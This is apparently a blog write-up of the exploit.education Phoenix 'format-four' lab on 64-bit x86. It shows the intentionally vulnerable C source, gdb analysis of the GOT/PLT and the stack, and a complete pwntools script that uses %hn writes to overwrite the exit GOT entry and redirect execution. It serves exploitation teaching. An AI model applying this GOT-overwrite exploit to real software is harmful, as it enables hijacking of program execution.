Let’s dive into a canonical example of a format string. I decided to do this writeup because I did not find any for this exercise under the x86 64bit architecture, even though it is almost as easy as in the 32 bit version (at least in theory).

Analysis of the vulnerable code

/*
 * phoenix/format-four, by https://exploit.education
 *
 * Can you affect code execution? Once you've got congratulations() to
 * execute, can you then execute your own shell code?
 *
 * Did you get a hair cut?
 * No, I got all of them cut.
 *
 */

#include <err.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define BANNER \
  "Welcome to " LEVELNAME ", brought to you by https://exploit.education"

void bounce(char *str) {
  printf(str);
  exit(0);
}

void congratulations() {
  printf("Well done, you're redirected code execution!\n");
  exit(0);
}

int main(int argc, char **argv) {
  char buf[4096];

  printf("%s\n", BANNER);

  if (read(0, buf, sizeof(buf) - 1) <= 0) {
    exit(EXIT_FAILURE);
  }

  bounce(buf);
}

The flaw is pretty obvious : we need to take advantage of the printf(str) line in the bounce function. Since exit is called on the following line, we can overwrite the exit address in the Global Offset Table (GOT).

Reminder : GOT and PLT

Just a quick reminder on the GOT / PLT : when first started, a program does not know where the libraries are loaded in memory. The linker could directly resolve all dependencies, but this would incur a constant overhead at the beginning of the execution. Instead, the linker is called in a lazy fashion : the dependency is resolved when the program first needs a function. To explain the procedure, let’s take an example with printf. Before it is first called, the printf address stored in the GOT merely points to the PLT (Procedure Linkage Table) :

(gdb) info fun printf
All functions matching regular expression "printf":

Non-debugging symbols:
0x0000000000400460  printf@plt

(gdb) x/5i 0x0000000000400460
   0x400460 <printf@plt>:	jmp    QWORD PTR [rip+0x200572]        # 0x6009d8 <printf@got.plt>
   0x400466 <printf@plt+6>:	push   0x0
   0x40046b <printf@plt+11>:	jmp    0x400450
   0x400470 <puts@plt>:	jmp    QWORD PTR [rip+0x20056a]        # 0x6009e0 <puts@got.plt>
   0x400476 <puts@plt+6>:	push   0x1

(gdb) x/1gx 0x6009d8
0x6009d8 <printf@got.plt>:	0x0000000000400466

So, first calling printf jumps to 0x400460 (printf@plt), which jumps to the address stored in the GOT entry for printf (0x6009d8), which itself points to the next instruction in the PLT 0x400466 (printf@plt+6). The PLT is a small procedure whose goal is to call the linker and to overwrite the GOT entry at 0x6009d8 with the actual address where exit is loaded in memory. Upon further calls to printf, the GOT entry at 0x6009d8 now points to the actual address :

(gdb) b *bounce+29
Breakpoint 1 at 0x40063a
Python Exception <class 'UnicodeEncodeError'> 'ascii' codec can't encode character '\u27a4' in position 12: ordinal not in range(128): 
(gdb) r
[...]
(gdb) x/1gx 0x6009d8
0x6009d8 <printf@got.plt>:	0x00007ffff7db971d

First unsucessful attempts

Ok, this seems easy in theory. We just need to overwrite the GOT with the address of congratulations using %hn specifiers and this should do the trick. We are going to use pwntools with FmtStr to automatically find the offset where the string starts in the stack.

>>> p = process('./format-four')
[x] Starting local process './format-four'
[+] Starting local process './format-four': pid 922
>>> def send_payload(payload):
...     p.recvline()
...     p.sendline(payload)
...     return p.recv()
... 
>>> res = FmtStr(execute_fmt=send_payload)
[*] Process './format-four' stopped with exit code 0 (pid 922)
Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
  File "/usr/local/lib/python2.7/dist-packages/pwnlib/fmtstr.py", line 218, in __init__
    self.offset, self.padlen = self.find_offset()
  File "/usr/local/lib/python2.7/dist-packages/pwnlib/fmtstr.py", line 237, in find_offset
    leak = pack(leak)
  File "/usr/local/lib/python2.7/dist-packages/pwnlib/util/packing.py", line 140, in pack
    raise ValueError("pack(): number does not fit within word_size [%i, %r, %r]" % (0, number, limit))
ValueError: pack(): number does not fit within word_size [0, 140737354128396, 4294967296]

Ooops, pwntools did not like it. Well, let’s do it manually then. The System V ABI for x86_64 architecture specifies that the first 6 arguments are passed in the following registers, respectively : rdi, rsi, rdx, rcx, r8, r9. If more arguments are needed, the stack is used. To find the good offset to reach the beginning of the input string, we need to find where the string is stored on the stack. Let’s use gef :

(gdb) r
Starting program: /opt/phoenix/amd64/format-four 
Welcome to phoenix/format-four, brought to you by https://exploit.education
aaaaaaaaaaaaaaaaaaaaaaa

Breakpoint 1, 0x0000000000400635 in bounce ()
──────────────────────────────────────────── registers ───────
[...]
──────────────────────────────────────────── stack ───────────
0x00007fffffffd630│+0x0000: 0x0000000000000000	 ← $rsp
0x00007fffffffd638│+0x0008: 0x00007fffffffd660  →  "aaaaaaaaaaaaaaaaaaaaaaa"
0x00007fffffffd640│+0x0010: 0x00007fffffffe660  →  0x0000000000000001	 ← $rbp
0x00007fffffffd648│+0x0018: 0x00000000004006b5  →  <main+89> mov eax, 0x0
0x00007fffffffd650│+0x0020: 0x00007fffffffe6b8  →  0x00007fffffffe8a9  →  "/opt/phoenix/amd64/format-four"
0x00007fffffffd658│+0x0028: 0x0000000100000000
0x00007fffffffd660│+0x0030: "aaaaaaaaaaaaaaaaaaaaaaa"	 ← $rdi
0x00007fffffffd668│+0x0038: "aaaaaaaaaaaaaaa"
──────────────────────────────────────────── code:x86:64 ─────
     0x400629 <bounce+12>      mov    rax, QWORD PTR [rbp-0x8]
     0x40062d <bounce+16>      mov    rdi, rax
     0x400630 <bounce+19>      mov    eax, 0x0
 →   0x400635 <bounce+24>      call   0x400460 <printf@plt>
   ↳    0x400460 <printf@plt+0>   jmp    QWORD PTR [rip+0x200572]        # 0x6009d8 <printf@got.plt>
        0x400466 <printf@plt+6>   push   0x0
        x40046b <printf@plt+11>  jmp    0x400450
        0x400470 <puts@plt+0>     jmp    QWORD PTR [rip+0x20056a]        # 0x6009e0 <puts@got.plt>
        0x400476 <puts@plt+6>     push   0x1
        0x40047b <puts@plt+11>    jmp    0x400450
──────────────────────────────────────────── arguments (guessed) ────
printf@plt (
   $rdi = 0x00007fffffffd660 → "aaaaaaaaaaaaaaaaaaaaaaa"
)

So, the string is stored at offset +0x30 (+6 bytes) from the stack pointer. Therefore, we should find our string as the 12th argument. Lets check :

user@phoenix-amd64:/opt/phoenix/amd64$ ./format-four 
Welcome to phoenix/format-four, brought to you by https://exploit.education
%12$016x
user@phoenix-amd64:/opt/phoenix/amd64$ 

Well, we did not get any output. That’s why pwntools crashed… Sometimes, and I’m not sure why, format strings using a number to specify the chosen argument do not work. So, we are going to rely solely on simple %x and %hn strings.

Manual solution

First, let’s check the string offset :

user@phoenix-amd64:/opt/phoenix/amd64$ ./format-four 
Welcome to phoenix/format-four, brought to you by https://exploit.education
%x%x%x%x%x%x%x%x%x%x%x---%x
f7ffdc0cf7ffb300f7dc2617000ffffd6b0ffffe6b04006b5ffffe7080---78257825

Ok, its working (0x78257825 is %x$x in little endian). Now let’s start writing our exploit. First, we need the address of congratulations :

user@phoenix-amd64:~$ readelf -s /opt/phoenix/amd64/format-four 
[...]
58: 0000000000400644    24 FUNC    GLOBAL DEFAULT    8 congratulations

Now, the problem is that we need to overwrite the whole content of the GOT entry corresponding to exit. To do so, we can’t just write 0x400644 characters to stdout, because 1) it would be very long and 2) we would write only on a word (4 bytes), not the whole 64-bit address (only the lower half). This means we need to overwrite 4 separate chunks of 2 bytes each. To achieve this, we use the following trick : since we write 2 bytes at the time, and since 0x10000 = 0 (mod 16 bits), once we have written 0x644 characters to stdout to write to the LSB, we can write 0x10000-0x644 chars to loop back to zero.

from pwn import *
from math import log

exit_got_addr = 0x6009f0
congratulations_addr = 0x400644
offset_param = 12

# Focus only on lower half, upper half is null
p0 = congratulations_addr & 0xffff
p1 = (congratulations_addr >> 16) & 0xffff

# Padding : start padded
payload = "%08x" * (offset_param-1)
payload += "%08x" * 11 # 44 first bytes in the stack are useless bc of the previous line, we read 11 more qwords. Total 88 bytes read and entered
len_pad = (offset_param-1+11)*8

# Middle of the payload : overwrite correct numbers
middle = "%{}x".format(p0 - len_pad)
middle += "%hn"
middle += "%{}x".format(0x10000 - p0 + p1) # Use overflow and the fact that for halfwords, 0x10000 = 0 (2 bytes)
middle += "%hn"
middle += "%{}x".format(0x10000 - p1) # We want to write 0x0000
middle += "%hn"
middle += "%hn"

# Beginning of the payload : go to the correct offset to start reading on correct address in stack
# print(len(middle)) # = 32
payload += "%x"*6 + "aaaa" # 48 bytes read, 16 bytes written + 32 for the middle = 48 -> OK
len_intro = 6*8+4

# Write again the payload by taking into account the start of the payload
payload += "%{}x".format(p0 - (len_pad + len_intro))
payload += "%hn"
payload += "%{}x".format(0x10000 - p0 + p1) # Use overflow and the fact that for halfwords, 0x10000 = 0 (2 bytes)
payload += "%hn"
payload += "%{}x".format(0x10000 - p1) # We want to write 0x0000
payload += "%hn"
payload += "%hn"

payload += "b"*8
payload += p64(exit_got_addr)
payload += "c"*8
payload += p64(exit_got_addr+2)
payload += "d"*8
payload += p64(exit_got_addr+4)
payload += p64(exit_got_addr+6)

p = process('/opt/phoenix/amd64/format-four')
p.recvline()
p.sendline(payload)
p.interactive()

Here is the result :

user@phoenix-amd64:~$ python test.py 
[+] Starting local process '/opt/phoenix/amd64/format-four': pid 1455
[*] Switching to interactive mode
[...]
Well done, you're redirected code execution!
Well done, you're redirected code execution!
Well done, you're redirected code execution!
Well done, you're redirected code execution!
Well done, you're redirected code execution!
[...]

Whew ! I think this example illustrates well how more difficult the implementation of an exploit can be in practice. The theory behind this pwn is not hard : but implementing it is harder. Happy hacking :bomb: .